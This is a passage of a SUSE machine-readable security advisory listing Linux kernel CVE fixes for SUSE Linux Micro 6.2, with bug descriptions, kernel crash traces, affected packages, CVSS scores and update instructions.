"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38569"
},
{
"cve": "CVE-2025-38589",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38589"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nneighbour: Fix null-ptr-deref in neigh_flush_dev().\n\nkernel test robot reported null-ptr-deref in neigh_flush_dev(). [0]\n\nThe cited commit introduced per-netdev neighbour list and converted\nneigh_flush_dev() to use it instead of the global hash table.\n\nOne thing we missed is that neigh_table_clear() calls neigh_ifdown()\nwith NULL dev.\n\nLet\u0027s restore the hash table iteration.\n\nNote that IPv6 module is no longer unloadable, so neigh_table_clear()\nis called only when IPv6 fails to initialise, which is unlikely to\nhappen.\n\n[0]:\nIPv6: Attempt to unregister permanent protocol 136\nIPv6: Attempt to unregister permanent protocol 17\nOops: general protection fault, probably for non-canonical address 0xdffffc00000001a0: 0000 [#1] SMP KASAN\nKASAN: null-ptr-deref in range [0x0000000000000d00-0x0000000000000d07]\nCPU: 1 UID: 0 PID: 1 Comm: systemd Tainted: G T 6.12.0-rc6-01246-gf7f52738637f #1\nTainted: [T]=RANDSTRUCT\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014\nRIP: 0010:neigh_flush_dev.llvm.6395807810224103582+0x52/0x570\nCode: c1 e8 03 42 8a 04 38 84 c0 0f 85 15 05 00 00 31 c0 41 83 3e 0a 0f 94 c0 48 8d 1c c3 48 81 c3 f8 0c 00 00 48 89 d8 48 c1 e8 03 \u003c42\u003e 80 3c 38 00 74 08 48 89 df e8 f7 49 93 fe 4c 8b 3b 4d 85 ff 0f\nRSP: 0000:ffff88810026f408 EFLAGS: 00010206\nRAX: 00000000000001a0 RBX: 0000000000000d00 RCX: 0000000000000000\nRDX: 0000000000000000 RSI: 0000000000000000 RDI: ffffffffc0631640\nRBP: ffff88810026f470 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000000\nR13: ffffffffc0625250 R14: ffffffffc0631640 R15: dffffc0000000000\nFS: 00007f575cb83940(0000) GS:ffff8883aee00000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007f575db40008 CR3: 00000002bf936000 CR4: 00000000000406f0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n \u003cTASK\u003e\n __neigh_ifdown.llvm.6395807810224103582+0x44/0x390\n neigh_table_clear+0xb1/0x268\n ndisc_cleanup+0x21/0x38 [ipv6]\n init_module+0x2f5/0x468 [ipv6]\n do_one_initcall+0x1ba/0x628\n do_init_module+0x21a/0x530\n load_module+0x2550/0x2ea0\n __se_sys_finit_module+0x3d2/0x620\n __x64_sys_finit_module+0x76/0x88\n x64_sys_call+0x7ff/0xde8\n do_syscall_64+0xfb/0x1e8\n entry_SYSCALL_64_after_hwframe+0x67/0x6f\nRIP: 0033:0x7f575d6f2719\nCode: 08 89 e8 5b 5d c3 66 2e 0f 1f 84 00 00 00 00 00 90 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 01 c3 48 8b 0d b7 06 0d 00 f7 d8 64 89 01 48\nRSP: 002b:00007fff82a2a268 EFLAGS: 00000246 ORIG_RAX: 0000000000000139\nRAX: ffffffffffffffda RBX: 0000557827b45310 RCX: 00007f575d6f2719\nRDX: 0000000000000000 RSI: 00007f575d584efd RDI: 0000000000000004\nRBP: 00007f575d584efd R08: 0000000000000000 R09: 0000557827b47b00\nR10: 0000000000000004 R11: 0000000000000246 R12: 0000000000020000\nR13: 0000000000000000 R14: 0000557827b470e0 R15: 00007f575dbb4270\n \u003c/TASK\u003e\nModules linked in: ipv6(+)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38589",
"url": "https://www.suse.com/security/cve/CVE-2025-38589"
},
{
"category": "external",
"summary": "SUSE Bug 1248366 for CVE-2025-38589",
"url": "https://bugzilla.suse.com/1248366"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38589"
},
{
"cve": "CVE-2025-38590",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38590"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: Remove skb secpath if xfrm state is not found\n\nHardware returns a unique identifier for a decrypted packet\u0027s xfrm\nstate, this state is looked up in an xarray. However, the state might\nhave been freed by the time of this lookup.\n\nCurrently, if the state is not found, only a counter is incremented.\nThe secpath (sp) extension on the skb is not removed, resulting in\nsp-\u003elen becoming 0.\n\nSubsequently, functions like __xfrm_policy_check() attempt to access\nfields such as xfrm_input_state(skb)-\u003exso.type (which dereferences\nsp-\u003exvec[sp-\u003elen - 1]) without first validating sp-\u003elen. This leads to\na crash when dereferencing an invalid state pointer.\n\nThis patch prevents the crash by explicitly removing the secpath\nextension from the skb if the xfrm state is not found after hardware\ndecryption. This ensures downstream functions do not operate on a\nzero-length secpath.\n\n BUG: unable to handle page fault for address: ffffffff000002c8\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\n PGD 282e067 P4D 282e067 PUD 0\n Oops: Oops: 0000 [#1] SMP\n CPU: 12 UID: 0 PID: 0 Comm: swapper/12 Not tainted 6.15.0-rc7_for_upstream_min_debug_2025_05_27_22_44 #1 NONE\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014\n RIP: 0010:__xfrm_policy_check+0x61a/0xa30\n Code: b6 77 7f 83 e6 02 74 14 4d 8b af d8 00 00 00 41 0f b6 45 05 c1 e0 03 48 98 49 01 c5 41 8b 45 00 83 e8 01 48 98 49 8b 44 c5 10 \u003c0f\u003e b6 80 c8 02 00 00 83 e0 0c 3c 04 0f 84 0c 02 00 00 31 ff 80 fa\n RSP: 0018:ffff88885fb04918 EFLAGS: 00010297\n RAX: ffffffff00000000 RBX: 0000000000000002 RCX: 0000000000000000\n RDX: 0000000000000002 RSI: 0000000000000002 RDI: 0000000000000000\n RBP: ffffffff8311af80 R08: 0000000000000020 R09: 00000000c2eda353\n R10: ffff88812be2bbc8 R11: 000000001faab533 R12: ffff88885fb049c8\n R13: ffff88812be2bbc8 R14: 0000000000000000 R15: ffff88811896ae00\n FS: 0000000000000000(0000) GS:ffff8888dca82000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: ffffffff000002c8 CR3: 0000000243050002 CR4: 0000000000372eb0\n DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n Call Trace:\n \u003cIRQ\u003e\n ? try_to_wake_up+0x108/0x4c0\n ? udp4_lib_lookup2+0xbe/0x150\n ? udp_lib_lport_inuse+0x100/0x100\n ? __udp4_lib_lookup+0x2b0/0x410\n __xfrm_policy_check2.constprop.0+0x11e/0x130\n udp_queue_rcv_one_skb+0x1d/0x530\n udp_unicast_rcv_skb+0x76/0x90\n __udp4_lib_rcv+0xa64/0xe90\n ip_protocol_deliver_rcu+0x20/0x130\n ip_local_deliver_finish+0x75/0xa0\n ip_local_deliver+0xc1/0xd0\n ? ip_protocol_deliver_rcu+0x130/0x130\n ip_sublist_rcv+0x1f9/0x240\n ? ip_rcv_finish_core+0x430/0x430\n ip_list_rcv+0xfc/0x130\n __netif_receive_skb_list_core+0x181/0x1e0\n netif_receive_skb_list_internal+0x200/0x360\n ? mlx5e_build_rx_skb+0x1bc/0xda0 [mlx5_core]\n gro_receive_skb+0xfd/0x210\n mlx5e_handle_rx_cqe_mpwrq+0x141/0x280 [mlx5_core]\n mlx5e_poll_rx_cq+0xcc/0x8e0 [mlx5_core]\n ? mlx5e_handle_rx_dim+0x91/0xd0 [mlx5_core]\n mlx5e_napi_poll+0x114/0xab0 [mlx5_core]\n __napi_poll+0x25/0x170\n net_rx_action+0x32d/0x3a0\n ? mlx5_eq_comp_int+0x8d/0x280 [mlx5_core]\n ? notifier_call_chain+0x33/0xa0\n handle_softirqs+0xda/0x250\n irq_exit_rcu+0x6d/0xc0\n common_interrupt+0x81/0xa0\n \u003c/IRQ\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38590",
"url": "https://www.suse.com/security/cve/CVE-2025-38590"
},
{
"category": "external",
"summary": "SUSE Bug 1248360 for CVE-2025-38590",
"url": "https://bugzilla.suse.com/1248360"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38590"
},
{
"cve": "CVE-2025-38645",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38645"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5: Check device memory pointer before usage\n\nAdd a NULL check before accessing device memory to prevent a crash if\ndev-\u003edm allocation in mlx5_init_once() fails.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
